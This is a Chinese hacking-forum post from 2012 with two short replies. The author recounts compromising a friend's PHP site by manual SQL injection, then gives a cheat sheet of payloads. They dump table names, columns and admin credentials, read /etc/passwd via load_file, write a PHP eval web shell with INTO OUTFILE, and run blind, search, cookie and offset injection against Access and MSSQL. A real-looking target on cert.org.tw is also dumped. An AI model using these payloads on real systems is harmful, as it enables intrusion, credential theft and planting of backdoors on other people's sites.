中国网络渗透测试联盟

标题: 手工注入拿下一站 [打印本页]

作者: admin    时间: 2012-9-23 14:47
标题: 手工注入拿下一站
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
! S+ I& @* X' n让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
. ~& e7 l  J- A1 A- Z2 d我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
6 Y0 A9 a1 q% P1 W7 {7 G如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
% H; J7 K2 T- }3 g1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
+ F( L+ f! y1 e: Z8 K) W这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:. G! T+ |: N# h! ?: w9 O
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
4 B7 F+ s4 n# d" W! }! n: [/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
, K, \# v. e. m& W2 U( h/ s3 M5 c                           m& A0 O4 A: E, d0 f7 ^
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
) I8 ]# i# `1 m/ \: M5 W8 k2 s3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
* H) x, [6 L1 H1 J: B4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息( Y$ G1 S4 t' Q
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。. D/ g. ~! C2 w, |
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
$ P3 i3 c4 Y+ s+ I8 y2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。5 F8 g" ?5 \9 ]2 {$ v, S& z
我就用的是第二个思路,: g/ a" d! @: n2 ~- J2 B* G
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
9 y1 N* ~3 }0 E4 c8 |0 q" b6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
) y; A) ^% B* ^5 a  d0 B$ P提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--  B! u3 m$ m8 h' V, Y% D
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。, [8 y9 o+ H9 Q
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
, \  r, K( M' u* f; a7 \是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd...... r/ s# W+ ?+ C4 W0 N" {
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
1 N4 V' E& X' O3 L8 _: a! _, O- C然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
4 h; l- o$ G% u" }调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
1 r) e/ d' z% F  Y' A% c下面是一些很普遍注入方式资料:
2 x. x. y) V* h0 {$ I! h注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='% x. d4 O- _7 ?4 u0 ^- y! E
拆半法
4 M$ k, _% D8 w" K9 H) @4 G######################################( o2 q3 ?2 _5 ]3 F" O! X
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。  Z0 }. r5 w1 `7 [0 ?4 U
and exists (select * from admin)- v/ r: P5 [% P5 g
and exists(select id from admin); v6 ?2 l. d0 @  y0 m1 y2 E
and exists(select id from admin where id=1)* ]4 o$ k9 B0 o2 n
and exists(select id from admin where id>1) 9 @) `' T+ ?4 y9 T+ C6 o
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
/ G  \) k0 W8 B) @( Land exists (select username from admin)
- ^9 I* J# N7 Hand exists (select password from admin)/ Q0 @! l( n0 D! P, p4 O
and exists (select id from admin where len(username)<10 and id=1)6 P$ g6 Z  g. |5 M- ^
and exists (select id from admin where len(username)>5 and id=1)
: c6 b9 Z- Q# Z+ Q! s( E7 Rand exists (select id from admin where len(username)=6 and id=1)
1 L4 r2 v6 y9 xand exists (select id from admin where len(password)<10 and id=1)
- \. C1 I: T8 jand exists (select id from admin where len(password)>5 and id=1)' {0 f( H) j% }" R6 Z) ?1 S1 t- Y
and exists (select id from admin where len(password)=7 and id=1)( D9 z% P& b7 R1 a% l
and (select top 1 asc(mid(username,1,1)) from admin)=97
1 U$ `: i$ r# q1 P9 ^6 V$ g返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。) y" u' a8 o5 e! B: c% Z0 H) A
猜第二位把username,1,1改成username,2,1就可以了。, X' C9 K7 p- T* T+ O* |! E
猜密码把username改成password就OK了" A+ E6 D. E, i+ x
##################################################/ Y: j4 Q0 e- k0 ?' ]) `7 z
搜索型注入
( a! W/ M. U% c0 P  K##################################
. i* ^6 I& I; o- z4 @%' and 1=1 and '%'='& B) Q* n: T' _' |
%' and exists (select * from admin) and '%'='5 l- i4 k5 D0 a9 |2 o. L
%' and exists(select id from admin where id=1) and '%'='
# l; Y% ?4 V& g1 N. F; I; ^' C7 X%' and exists (select id from admin where len(username)<10 and id=1) and '%'='  Y' d' P6 ?& Q! X. y
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
$ P& B5 _8 n1 {# Q) J4 Z7 w) i%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
) X5 I. y  U1 [" M: E; o这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='( s8 o# S; H& I9 l7 e6 o6 V0 ^" K) O
对于MSSQL数据库,后面可以吧 and '%'='换成--
4 w& J5 p" W( h  c) b还有一点搜索型注入也可以使用union语句。4 D; P1 [  O4 O# n& Q' G
########################################################! f; H* ]) x* q" s
联合查询。
* `% Y7 [3 z) f: N#####################################. W+ f9 p7 B. w$ I
order by 10! p& U" m1 k% N
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
8 w9 t) J7 ]% o* a( {/ Pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
1 n7 [3 J1 P0 u! ^/ Pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=19 c2 r: S. y# \0 u6 Q
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)6 ~' l1 e9 Z9 y1 t+ v9 h
###################################8 K2 ^* R6 Z7 a1 g
cookie注入
0 J" Y+ s% f4 r+ e5 y) N" U###############################$ N# ?% I/ b" _9 C
http://www.******.com/shownews.asp?id=127( p! `1 t7 x( Q0 S4 Y8 z: }9 l1 Q0 ~
http://www.******.com/shownews.asp' V8 B1 X- G+ x( e/ f; b8 Z9 c
alert(="id="+escape("127"));
; D) u( h/ z( _6 c/ f& c: @alert(="id="+escape("127 and 1=1"));7 n2 w( \, i5 e/ W" {
alert(="id="+escape("127 order by 10"));- d# ]0 B7 ^1 N
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));6 N) r: @+ |) X& U
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
2 T: ]: G; y( Q( J0 n/ m这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。! r4 ^. k/ `. G% T
###################################7 H0 s5 ?& _: z% {" y
偏移注入$ ?* Y+ s- T3 Q& v0 q4 _( P# }5 }7 n
###########################################################
# k! `6 W4 D3 }  C2 o" _1 l# cunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin6 v* g( V9 q+ G, ]4 j+ O; L
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin# O7 p  @; B% \$ `5 `2 d0 q3 [, G
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
+ C+ c3 N5 S, J' sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
! l, U* J& K% L9 w3 M% ?union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
. ~0 Q0 h! ]2 w8 c7 a+ eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)5 s3 D7 u' S) t. s, Y/ \: |
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
: W# I# @4 h, oa.id=d.id)# D# [( a; R! l8 K  {( D* G
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)$ Q& L! \# R+ w  M! u& Q/ b
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
6 e" J9 y! R. d4 B2 z  4 E9 m! w3 c7 R( o0 O8 X) l; p* {
============================================================================================================
8 E' K6 h5 J* |2 x9 X2 Z1.判断版本  G4 Z9 I! C1 a* j8 W; ^8 I
and ord(mid(version(),1,1))>51. G* |5 p8 J; I% \5 G- n
返回正常,说明大于4.0版本,支持ounion查询2 M% [! ?  {8 _7 S$ j
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解% `$ K1 c4 j6 F' {
and 2=4 union select 1,2,3,4,5,6,7,8,9--
. d* Q6 `& E; ?# Y3.查看数据库版本及当前用户,
7 m% j2 @# X" F! xand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
+ `: W0 s4 e. K" R8 c, ?( `数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,& x6 O4 l3 ]/ a% l2 |
4.判断有没有写权限
* k! s5 Y/ l( Q# qand (select count(*) from MySQL.user)>0-- / ~7 y+ o. B% a# Q* ?
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
2 T/ T$ G6 X  @; g* ~" ^用不了这个命令,就学习土耳其黑客手法,如下
* S* q) S% n& v" O- g1 \6 n) V; l+ ?, ]and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--* I* p" R' Q' D# X& j
6.爆表,爆库
3 L6 O# y( W! [/ z, Q  Y2 T+ N9 @! F, `and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
) D2 r- \1 a& a! E9 b6 k7.爆列名,爆表9 V- \0 y  m  Z& C- C7 ?) Z8 w* ]
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
" t" N$ a- C8 @0 g6 h5 ~8.查询字段数,直接用limit N,1去查询,直接N到报错为止。1 J  C! B' v1 }0 P; h. Q1 Z3 g
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
& \  T- p/ H+ S7 f4 ^" X5 g9.爆字段内容$ h0 J7 Y* B# q) Q2 q' Q4 n0 j
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, C7 y1 F' g' `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
作者: xiancda    时间: 2012-9-24 21:40
非常好的归纳。坐下慢慢看~
作者: wuyu    时间: 2012-9-25 18:53
谢谢分享,学习思路啊




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2